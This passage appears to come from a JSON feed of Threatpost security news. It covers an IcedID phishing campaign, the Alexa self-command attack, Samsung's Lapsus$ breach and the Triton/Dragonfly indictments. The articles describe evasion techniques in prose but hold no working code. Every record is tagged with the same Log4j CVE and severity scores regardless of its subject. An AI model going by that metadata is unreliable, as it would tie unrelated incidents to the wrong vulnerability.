couple of key ways that make it even more dangerous to targets, which include organizations within energy, healthcare, law and pharmaceutical sectors, researchers noted.\n\nNot only is the threat actor now using compromised Microsoft Exchange servers to send the phishing emails from the account that they stole from, but the delivery of the malicious payload also has shifted in a way that can execute malware without the user even knowing, researchers said.\n\n\u201cThe payload has also moved away from using office documents to the use of ISO files with a Windows LNK file and a DLL file,\u201d researchers wrote. \u201cThe use of ISO files allows the threat actor to bypass the [Mark-of-the-Web](<https://attack.mitre.org/techniques/T1553/005/>) controls, resulting in execution of the malware without warning to the user.\u201d\n\nPreviously the infection chain most commonly associated with IcedID phishing campaigns has been an email with an attached password-protected ZIP archive that contains a macro-enabled Office document, which executes the IcedID installer.\n\n## **Breakdown of the Attack Chain**\n\nThe new campaign starts with a phishing email that includes a message about an important document and includes a password-protected ZIP archive file attached, the password for which is included in the email body.\n\nThe email seems extra convincing to users because it uses what\u2019s called \u201cthread hijacking,\u201d in which attackers use a portion of a previous thread from a legitimate email found in the inbox of the stolen account.\n\n\u201cBy using this approach, the email appears more legitimate and is transported through the normal channels which can also include security products,\u201d researchers wrote.\n\nThe majority of the originating Exchange servers that researchers observed in the campaign appear to be unpatched and publicly exposed, \u201cmaking the ProxyShell vector a good theory,\u201d they wrote. [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) is a remote-code execution (RCE) bug discovered in Exchange Servers last year that has since been patched but has been [throttled by attackers](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>).\n\nOnce unzipped, the attached file includes a single \u201cISO\u201d file with the same file name as the ZIP archive that was created not that long before the email was sent. That ISO file includes two files: a LNK file named \u201cdocument\u201d and a DLL file named \u201cmain,\u201d also prepared relatively recently and potentially used in previous phishing email, researchers said.\n\nWhen a user double clicks the LNK file, it uses \u201cregsvr32\u201d to execute the DLL file, which allows for proxy execution of malicious code in main.dll for defense evasion, they wrote in the post. The DLL file is a loader for the IcedID payload.\n\nThe loader will locate the encrypted payload, which is stored in the resource section of the binary, through the technique API hashing. The resulting hash is then compared with a hardcoded hash, locating the call for FindResourceA, which is dynamically called to fetch the encrypted payload, researchers wrote.\n\nThe ultimate step in the attack chain is that the IcedID \u201cGziploader\u201d payload is decoded and placed in memory and then executed. The GZiploader fingerprints the machine and sends a beacon to the command-and-control (C2) server \u2013 located at yourgroceries[.]top_._ \u2013 with information about the infected host, which then can be used for further nefarious activity.\n\n## **Evolution of a Threat**\n\nResearchers at IBM first discovered IcedID [back in 2017](<https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/>) as a trojan targeting banks, payment card providers, mobile services providers, payroll, web mail and e-commerce sites.\n\nThe malware has [evolved over the years](<https://threatpost.com/botnet-operators-team-up-to-leverage-icedid-trickbot-trojans/132392/>) and already has a storied history of clever obfuscation. For example, it [resurfaced](<https://threatpost.com/icedid-banker-adding-steganography-covid-19-theme/156718/>) during the [COVID-19 campaign](<https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware>) with new functionality that uses steganography \u2013 the practice of hiding code within images to stealthily infect victims \u2013 as well as other enhancements.\n\nThe new campaign is evidence of its [further evolution](<https://threatpost.com/spam-icedid-banking-trojan-variant/167250/>) and could signify that IcedID is indeed becoming, [as many fear](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), the new [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) \u2013 a modular threat that began as a trojan but steadily evolved into one of the most dangerous malwares ever seen.\n\n\u201cThis attack shows how much effort attackers put in all the time to evade detection and why defense in depth is necessary,\u201d observed Saumitra Das, CTO and co-founder at security firm [Blue Hexagon](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURk7nu5DOXPXjQHtUbQPB-2Bo-3Dj4oZ_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Baowev7BWgf7-2Fsft7vhZ-2FleI4B1CtNAbekmGpeBhmEFQ0kWRSkTE0FzXKh-2Bz963fPXZn0hvo6ZGATosJpWWMJIx2kznvRhglY0WQkeZMakpGSSCIz9LKVoA7IXOHVn5P16MOaoTEh1LFaqgv30hL1UfNg9Za-2FKpoEtnwzBDLz4DtQVA3dFYwDxuvZKeD9Y8Hi4WQLnSai8UFna4-2BIEwYtA0NcX5KrsjsbSEnjBzFNfZ-2B0-3D>), in an email to Threatpost.\n\nThis time and effort, in turn, shows a level of sophistication on the part of those behind IcedID in that they have thorough knowledge of contemporary email protections and are continuously adding new tactics as security also grows and evolves, he said.\n\n\u201cMany email security systems use reputation of senders to block malicious email without being able to assess the email itself,\u201d Das noted. \u201cHere, they used compromised Exchange servers to make it through.\u201d\n\nThe group\u2019s use of obfuscated file formats to deliver malware, as well as the final payload\u2019s delivery over the network, also demonstrate that the threat actors know how to evade signature and sandboxes, he added.\n\n\u201cThese attacks often go much deeper than simply stealing data,\u201d concurred Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PZQLK_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYMmRr5z7OIF8mKih-2F25UI0RQa6-2Bdcn0eyt9a-2F-2BxbdAQ8flodV7haNCcr-2BW1iLqgw0DYt7ntjLmuD7PDGwxwwHSq2gHGWVXVmYGWcDbHq95V0DcFYQggLtmHop2EFskxujGp5A7HFr4-2Bzu8HP-2Fn84dnll5nv7EwsYGa4Z-2BkWEdDcrCAY75JBexQSBfFsv2LbL-2Bn1Qz-2FYzen2NsuzLcfAC1av2zq9EhGfkk9KycL0qVySQ-3D>)**, **in an email to Threatpost. \u201cThe cybercriminals take the time to read through the mailboxes to understand the inter-organization relationships and operating procedures.\n\n\u201cTo protect themselves from similar attacks, it\u2019s critical that organizations ensure that they apply security patches promptly and thoroughly in their environment,\u201d he added. However, what is historically true for patching remains true now: that it\u2019s \u201ca task that\u2019s easier said than done,\u201d Clemens acknowledged.\n\n\u201cIt really takes a cultural approach to cybersecurity to plan for failures in defenses like patch management,\u201d he said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T14:02:41", "type": "threatpost", "title": "Exchange Servers Speared in IcedID Phishing Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-29T14:02:41", "id": "THREATPOST:8243943141B8F18343765DA77D33F46C", "href": "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-08T18:32:41", "description": "UPDATE\n\nResearchers from the University of London and the University of Catania have discovered how to weaponize Amazon Echo devices to hack themselves.\n\nThe \u2013 dubbed \u201cAlexa vs. Alexa\u201d \u2013 leverages what the researchers called \u201ca command self-issue vulnerability\u201d: using pre-recorded messages which, when played over a 3rd\u2013 or 4th-generation Echo speaker, causes the speaker to perform actions on itself.\n\n## How to Make Alexa Hack Itself\n\nSmart speakers lay dormant during the day, waiting for a user to vocalize a particular activation phrase: i.e., \u201cHey, Google,\u201d \u201cHey, Cortana\u201d or, for the Amazon Echo, \u201cAlexa,\u201d or simply, \u201cEcho.\u201d Usually, of course, it\u2019s the device\u2019s owner who issues such commands.\n\nHowever, researchers found that \u201cself-activation of the Echo device [also] happens when an audio file reproduced by the device itself contains a voice command.\u201d And even if the device asks for a secondary confirmation, in order to perform a particular action, \u201cthe adversary only has to always append a \u2018yes\u2019 approximately six seconds after the request to be sure that the command will be successful.\u201d\n\nTo get the device to play a maliciously crafted recording, an attacker would need a smartphone or laptop in Bluetooth-pairing range. Unlike internet-based attacks, this scenario requires proximity to the target device. This physical impediment is balanced by the fact that, as the researchers noted, \u201conce paired, the Bluetooth device can connect and disconnect from Echo without any need to perform the pairing process again. Therefore, the actual attack may happen several days after the pairing.\u201d\n\nAlternatively, the report stated, attackers could use an internet radio station, beaming to the target Echo like a command-and-control server. This method \u201cworks remotely and can be used to control multiple devices at once,\u201d but would required extra steps, including tricking the targeted user into downloading a malicious [Alexa \u201cskill\u201d](<https://threatpost.com/researchers-hacked-amazons-alexa-to-spy-on-users-again/131401/>) (app) to an Amazon device.\n\nUsing the Alexa vs. Alexa attack, attackers could tamper with applications downloaded to the device, make phone calls, place orders on Amazon, eavesdrop on users, control other connected appliances in a user\u2019s home and more.\n\n\u201cThis action can undermine physical safety of the user,\u201d the report stated, \u201cfor example, when turning off the lights during the evening or at nighttime, turning on a smart microwave oven, setting the heating at a very high temperature or even unlocking the smart lock for the front door.\u201d\n\nIn testing their attack, the authors were able to remotely turn off the lights in one of their own homes 93 percent of the time.\n\n## Smart Speakers Are Uniquely Vulnerable\n\nBecause they\u2019re always listening for their wake word, and because they\u2019re so often interconnected with other devices, smart speakers are prone to unique security vulnerabilities. The Echo series of devices, in particular, has been linked with a series of privacy risks, from microphones \u201c[hearing](<https://threatpost.com/hey-alexa-who-messaging/162587/>)\u201d what people text on nearby smartphones to audio recordings being stored [indefinitely](<https://threatpost.com/amazon-admits-alexa-voice-recordings-saved-indefinitely/146225/>) on company servers.\n\nThe physical proximity required for Bluetooth, or having to trick users into downloading malicious skills, limits but does not eliminate the potential for harm in such a scenario as the Alexa vs. Alexa report described, according to John Bambenek, principal threat hunter at Netenrich. Those living in dense cities are potentially at risk, and individuals \u201cat most risk are those in domestic violence scenarios,\u201d he wrote, via email. For that reason, \u201csimply accepting the risk isn\u2019t acceptable.\u201d\n\nThe research prompted Amazon to patch the command self-issue vulnerability, which is the benefit of having a robust threat-hunting culture.\n\n\u201cMost people aren\u2019t evil,\u201d wrote Bambenek. \u201cIt is hard to test new technology against criminal intent because even testers lack the criminal mindset (and that\u2019s a good thing for society). As technology gets adopted, we find things we overlook and make it better.\u201d\n\nFor its part, Amazon gave Threatpost the following statement:\n\n_\u201cAt Amazon, privacy and security are foundational to how we design and deliver every device, feature, and experience. We appreciate the work of independent security researchers who help bring potential issues to our attention, and are committed to working with them to secure our devices. We fixed the remote self-wake issue with Alexa Skills caused by extended periods of silence resulting from break tags as demonstrated by the researchers. We also have systems in place to continually monitor live skills for potentially malicious behavior, including silent re-prompts. Any offending skills we identify are blocked during certification or quickly deactivated, and we are constantly improving these mechanisms to further protect our customers.\u201d_\n\nThe latest, patched version of Alexa device software can be found [here](<https://www.amazon.com/gp/help/customer/display.html?nodeId=GMB5FVUB6REAVTXY&linkCode=sl2&tag=hothard-20&linkId=070200dafa741d26cbd19cf21d735449&language=en_US&ref_=as_li_ss_tl>).\n\n_This posting was updated on March 8 at 1:30 p.m. ET to include Amazon\u2019s statement. _\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T21:30:12", "type": "threatpost", "title": "Novel Attack Turns Amazon Devices Against Themselves", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T21:30:12", "id": "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "href": "https://threatpost.com/attack-amazon-devices-against-themselves/178797/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T19:35:26", "description": "Just days after leaking data it claims to have exfiltrated from chipmaker NVIDIA, ransomware group Lapsus$ is claiming another international company among its victims \u2014 this time releasing data purportedly stolen from Samsung Electronics.\n\nThe consumer electronics giant confirmed in a [media statement](<https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code>) on Monday that a \u201csecurity breach\u201d had occurred related to internal company data \u2014 but said that customer and employee data were not impacted.\n\nLapsus$ had earlier announced on its Telegram channel that it had [breached Samsung](<https://securityaffairs.co/wordpress/128712/cyber-crime/samsung-electronics-lapsus-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=samsung-electronics-lapsus-ransomware>) and offered a taste of what it had as proof, including biometric authentication information and source code from both Samsung and one of its suppliers, Qualcomm. That\u2019s according to Security Affairs, which also published a screen grab of the data leak.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07135942/lapsu-telegram-annoucement-screen-grab.jpg>)\n\nScreen capture of the Telegram message with data. Source: Security Affairs.\n\n\u201cIf Samsung\u2019s keys were leaked, it could compromise the TrustZone environment on Samsung devices that stores especially sensitive data, like biometrics, some passwords and other details,\u201d said Casey Bisson, head of product and developer relations at BluBracket, via email. \u201cThe TrustZone environment is useful because it creates a strong security barrier to attacks by Android malware.\u201d\n\nHe added that if the leaked data allows malware to access the TrustZone environment, it could make all data stored there vulnerable.\n\n\u201cIf Samsung has lost control of the signing keys, it could make it impossible for Samsung to securely update phones to prevent attacks on the TrustZone environment,\u201d he said. \u201cCompromised keys would make this a more significant attack [than NVIDIA](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), given the number of devices, their connection to consumers, and amount of very sensitive data that phones have.\n\n## **Ransomware Is Here to Stay **\n\nObviously, the implications of source code and thousands of employee credentials out in the open are serious. The [ransomware attacks](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>) on Samsung and NVIDIA, and even January\u2019s Lapsus$ attack on media outlets in Portugal, SIC Noticias and Expresso, should serve as a grim reminder that the [ransomware](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) business is booming, according to experts.\n\n> The websites of two of the main media organizations in Portugal [@expresso](<https://twitter.com/expresso?ref_src=twsrc%5Etfw>) and [@SICNoticias](<https://twitter.com/SICNoticias?ref_src=twsrc%5Etfw>) are down, after an apparent hacking, according to their parent company, Impresa. [pic.twitter.com/la2Pi9JRgG](<https://t.co/la2Pi9JRgG>)\n> \n> \u2014 Mia Alberti (@mialberti) [January 2, 2022](<https://twitter.com/mialberti/status/1477622312098840581?ref_src=twsrc%5Etfw>)\n\n\u201cRansomware is not going away,\u201d Dave Pasirstein, CPO and head of engineering for TruU told Threatpost by email. \u201cIt\u2019s a lucrative business that is nearly impossible to protect all risk vectors; however, it is made easy by enterprises failing to take enough precautionary steps.\u201d\n\n## **Ransomware Risk Vectors Abound **\n\nThose steps, according to Pasirstein, must include a zero-trust approach, an effective patching strategy, endpoint and email protection, employee training and strong authentication such as modern MFA. He added, \u201cideally, a password-less MFA that is not based on shared secrets and thus, cannot easily be bypassed by a server compromise.\u201d\n\nThe group\u2019s recent successes also highlight the need to protect data across the organization, Purandar Das, CEO of Sotero told Threatpost.\n\n\u201cObviously a very concerning development for Samsung and NVIDIA if true,\u201d he said. \u201cWhat this also demonstrates is the vulnerability of data in any data store within organizations.\u201d\n\nHe explained a common security approach is to focus on locking down structured data storage, which can be shortsighted.\n\n\u201cMost security has been focused on structured datastores with the assumption that the attackers are looking for confidential information that relates to individuals whether they are customers, consumers or employees,\u201d Das added. \u201cHowever, confidential or sensitive data is spread in more than just structured data stores.\u201d\n\nIn the case of Samsung, beyond releasing the company\u2019s competitive secrets, the Lapsus$ breach leaves the company open to future compromise, he warned.\n\n\u201cIn the case of Samsung, it would provide a pathway into any or many Samsung devices rendering them vulnerable in ways that wouldn\u2019t have been feasible,\u201d Das said. \u201cSecurity, or more importantly data-focused security, is essential. Securing the data is probably more critical or just as critical as todays security of attempting to lock down the perimeter.\u201d\n\n**_Register Today for [Log4j Exploit: Lessons Learned and Risk Reduction Best Practices](<https://bit.ly/3BXPL6S>) \u2013 a LIVE Threatpost event sked for Thurs., March 10 at 2PM ET. Join Sonatype code expert Justin Young as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T19:28:36", "type": "threatpost", "title": "Samsung Confirms Lapsus$ Ransomware Hit, Source Code Leak", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T19:28:36", "id": "THREATPOST:14D52B358840B9265FED987287C1E26E", "href": "https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T23:16:23", "description": "The U.S. Department of Justice (DOJ) has [indicted](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>) four Russian government employees in connection to plots to cyber-fry critical infrastructure in the United States and beyond, including at least one nuclear power plant.\n\nThe campaigns involved one of the most dangerous malwares ever encountered in the operational technology and energy sectors: Triton, aka Trisis, a Russia-linked malware used to shut down an oil refinery in 2017 and [another Mideast target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) in 2019.\n\nTwo related indictments were unsealed yesterday: one that named Evgeny Viktorovich Gladkikh ([PDF](<https://www.justice.gov/opa/press-release/file/1486831/download>)), an employee of the Russian Ministry of Defense, and another ([PDF](<https://www.justice.gov/opa/press-release/file/1486836/download>)) that named three officers in Military Unit 71330 \u2013 or \u201cCenter 16\u201d \u2013 of Russia\u2019s Federal Security Service (FSB), which is the successor to Russia\u2019s KGB.\n\nCenter 16 is the FSB\u2019s main structural unit for signals intelligence, consisting of a central unit housed in unmarked administrative buildings spread across Moscow and secluded forest enclosures, with massive satellite dishes pointing out to listen to the world. It\u2019s known by cybersecurity researchers as \u201cDragonfly,\u201d \u201cEnergetic Bear\u201d and \u201cCrouching Yeti.\u201d\n\n## $10M Reward for Intel on FSB Officers\n\nThere\u2019s a reward on the heads of the trio of FSB officers for allegedly hacking a refinery. The State Department [said](<https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-fsb-officers-conducting-malicious-activity-against-u-s-critical-infrastructure-between-2012-2017/>) on Thursday that its Rewards for Justice (RFJ) program is offering $10 million for information on the three, whose names are Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov and Marat Valeryevich Tyukov.\n\nThe officers were allegedly involved in computer intrusions, wire fraud, aggravated identity theft and damage to an energy facility. The reward marks the first time that RFJ has named a foreign government security personnel under its critical infrastructure reward offer, the State Department said.\n\n## Triton/Trisis\n\nTriton was allegedly used in campaigns run between May and September 2017.\n\nResearchers have compared Triton\u2019s targeting of industrial control systems (ICS) to malware used in the watershed attacks [Stuxnet](<https://threatpost.com/stuxnets-first-five-victims-provided-path-to-natanz/109291/>) and Industroyer/Crashoverride, the latter of which is a backdoor that targets ICS and which took down the Ukrainian power grid in Kiev in 2016. In 2018, research revealed that Industroyer [was linked](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) to the massive [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) ransomware outbreak that crippled organizations around the world the year before.\n\nAccording to the indictment, between May and September 2017, Gladkikh, a 36-year-old computer programmer employed by an institute affiliated with the Russian Ministry of Defense, was involved in a campaign to hack global energy facilities \u201cusing techniques designed to enable future physical damage with potentially catastrophic effects.\u201d The hacking allegedly led to two separate emergency shutdowns at a foreign facility.\n\nAlong with co-conspirators, Gladkikh allegedly hacked the systems of \u201ca foreign refinery\u201d (presumably Saudi oil giant Petro Rabigh) in 2017 and installed Triton/Trisis malware on a safety system produced by Schneider Electric. Triton actually takes its name from the fact that it\u2019s designed to target Triconex safety instrumented system (SIS) controllers, which are sold by Schneider Electric. Triton surfaced again in 2019, when it was again [used to target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) an undisclosed company in the Middle East.\n\nTriton was designed to prevent the refinery\u2019s safety systems from functioning \u2013 \u201cby causing the ICS to operate in an unsafe manner while appearing to be operating normally,\u201d the DOJ said \u2013 thereby leaving the refinery open to damage and jeopardizing anybody nearby.\n\n\u201cWhen the defendant deployed the Triton malware, it caused a fault that led the refinery\u2019s Schneider Electric safety systems to initiate two automatic emergency shutdowns of the refinery\u2019s operations,\u201d the DOJ said. Between February and July 2018, Gladkikh and his crew allegedly researched and (unsuccessfully) tried to hack the computer systems used by a U.S. company with similar refineries.\n\nAs energy news outlet E&amp;E News [reported](<https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/>) in 2019, in the early evening of Aug. 4, 2017, two emergency shutdown systems sprang to life at Petro Rabigh\u2019s sprawling refinery along Saudi Arbia\u2019s Red Sea coast. Engineers working the weekend shift were oblivious, even as the systems knocked the complex offline \u201cin a last-gasp effort to prevent a gas release and deadly explosion.\u201d\n\n\u201c[They] spotted nothing out of the ordinary, either on their computer screens or out on the plant floor,\u201d according to E&amp;E News.\n\nGladkikh has been charged with three counts: conspiracy to cause damage to an energy facility, attempt to damage an energy facility, and one count of conspiracy to commit computer fraud.\n\n## FSB Officers\u2019 Indictment: The Dragonfly Supply-Chain Attack\n\nThe indictment that names the FSB officers alleges that, between 2012 and 2017, Akulov, Gavrilov, Tyukov and their co-conspirators engaged in computer intrusions, including supply chain attacks, \u201cin furtherance of the Russian government\u2019s efforts to maintain surreptitious, unauthorized and persistent access to the computer networks of companies and organizations in the international energy sector, including oil and gas firms, nuclear power plants, and utility and power transmission companies.\u201d\n\nSpecifically, they allegedly targeted the software and hardware that controls equipment in power generation facilities, known as ICS or Supervisory Control and Data Acquisition (SCADA) systems.\n\n\u201cAccess to such systems would have provided the Russian government the ability to, among other things, disrupt and damage such computer systems at a future time of its choosing,\u201d according to the DOJ\u2019s [press release](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>).\n\nThe indictment describes a campaign against the energy sector that involved two phases: The first was a supply-chain attack that was commonly referred to as \u201cDragonfly\u201d or \u201cHavex\u201d by security researchers. Dragonfly took place between 2012 and 2014 and compromised computer networks of ICS/SCADA system manufacturers and software vendors.\n\nIt involved tucking the Havex remote-access trojan (RAT) [inside legitimate software updates](<https://threatpost.com/ics-malware-found-on-vendors-update-installers/106910/>). According to a 2014 advisory from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the Havex RAT targeted vendors via phishing campaigns, website redirects and, finally, by infecting the software installers. Three vendor websites were compromised in watering-hole attacks, the ICS-CERT advisory said.\n\n\u201cAfter unsuspecting customers downloaded Havex-infected updates, the conspirators would use the malware to, among other things, create backdoors into infected systems and scan victims\u2019 networks for additional ICS/SCADA devices,\u201d according to the DOJ. The gang allegedly managed to install malware on more than 17,000 unique devices in the United States and abroad, including ICS/SCADA controllers used by power and energy companies.\n\n## Dragonfly 2.0: Spearphishing a Nuclear Power Plant\n\nBetween 2014 and 2017, the campaign entered into what\u2019s commonly referred to as \u201cDragonfly 2.0,\u201d wherein the suspects allegedly turned their focus to specific energy sector entities and individuals and engineers who worked with ICS/SCADA systems.\n\nThis second phase entailed spearphishing attacks targeting more than 3,300 users at more than 500 U.S. and international companies and entities, in addition to U.S. government agencies such as the Nuclear Regulatory Commission.\n\nThe spearphishing attacks sometimes struck gold, including in the compromise of the business network (i.e., involving computers not directly connected to ICS/SCADA equipment) of the Wolf Creek Nuclear Operating Corporation (Wolf Creek) in Burlington, Kansas. Wolf Creek operates a nuclear power plant.\n\n\u201cMoreover, after establishing an illegal foothold in a particular network, the conspirators typically used that foothold to penetrate further into the network by obtaining access to other computers and networks at the victim entity,\u201d according to the DOJ.\n\nDragonfly 2.0 also entailed a watering-hole attack wherein the alleged attackers exploited publicly known vulnerabilities in [content management software ](<https://threatpost.com/threatlist-wordpress-vulnerabilities/140690/>)(CMS) to compromise servers that hosted websites commonly visited by ICS/SCADA system and other energy sector engineers. \u201cWhen the engineers browsed to a compromised website, the conspirators\u2019 hidden scripts deployed malware designed to capture login credentials onto their computers,\u201d the DOJ said.\n\nThe campaign targeted victims in the United States and in more than 135 other countries, the Feds said.\n\nThe FSB officers are looking at charges of conspiracy to cause damage to the property of an energy facility and commit computer fraud and abuse and conspiracy to commit wire fraud. Akulov and Gavrilov are also charged with substantive counts of wire fraud and computer fraud related to unlawfully obtaining information from computers and causing damage to computers. Akulov and Gavrilov are also charged with three counts of aggravated identity theft.\n\n## Still Gaping Security Holes in Energy Companies\n\nLookingGlass CEO Gilman Louie, an expert on national security and cybersecurity who regularly shares or analyzes intel with government agencies, told Threatpost on Friday that legal actions against the potential operators of the critically dangerous Triton malware are welcome: They\u2019re a \u201cpositive move [that] sends a strong message to cybercrime and nation-state actors globally,\u201d he said via email.\n\nOn the less-positive side, a recent LookingGlass cyber profile of the U.S. Energy sector looks grim.\n\nMany energy companies are sitting ducks, with current cybersecurity exposures that have already been exploited by Russian actors in the past, including open ports that enable threat actors to gain full remote access.\n\nThe report shares vulnerabilities and exposures that Russian hackers are known to have used. \u201cFor years, energy companies have been hammered on securing their operational technology. The Triton attacks show why this is important,\u201d Louie noted.\n\nBut he stated that \u201corganizations also need to ensure they\u2019re improving security on their traditional IT side.\u201d He pointed to the Colonial Pipeline attack as an example of how adversaries \u201cdidn\u2019t need in-depth knowledge of [operational technology, or OT] to shut down the flow of gas or oil.\u201d \n\nLookingGlass research shows that, across the energy sector, there are vulnerabilities that are more than 5 years old that haven\u2019t been dealt with, and open ports like remote desktop that are \u201cbasically unprotected doors into an organization.\u201d\n\nEnergy companies need to be patching or updating their systems, Louie said and shutting those open doors: \u201cIf they really need a port open for remote desktop, then they need to add layers of compensating security controls to make sure it\u2019s not easy to exploit.\u201d\n\nWhen unsealing the indictments, the government noted that it\u2019s taking action to [enhance private sector network defense efforts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-083a>) and to [disrupt similar malicious activity](<https://protect2.fireeye.com/v1/url?k=73f0be82-2c6b867e-73f79a67-ac1f6b01771c-a72e8f7b8ceb667b&q=1&e=d2252912-db07-4b30-8381-4dbd442acfc0&u=https%3A%2F%2Frewardsforjustice.net%2Findex%2F%3Fjsf%3Djet-engine%3Arewards-grid%26tax%3Dcyber%3A857>).\n\nOther security issues that Russian actors have leveraged, which companies need to address 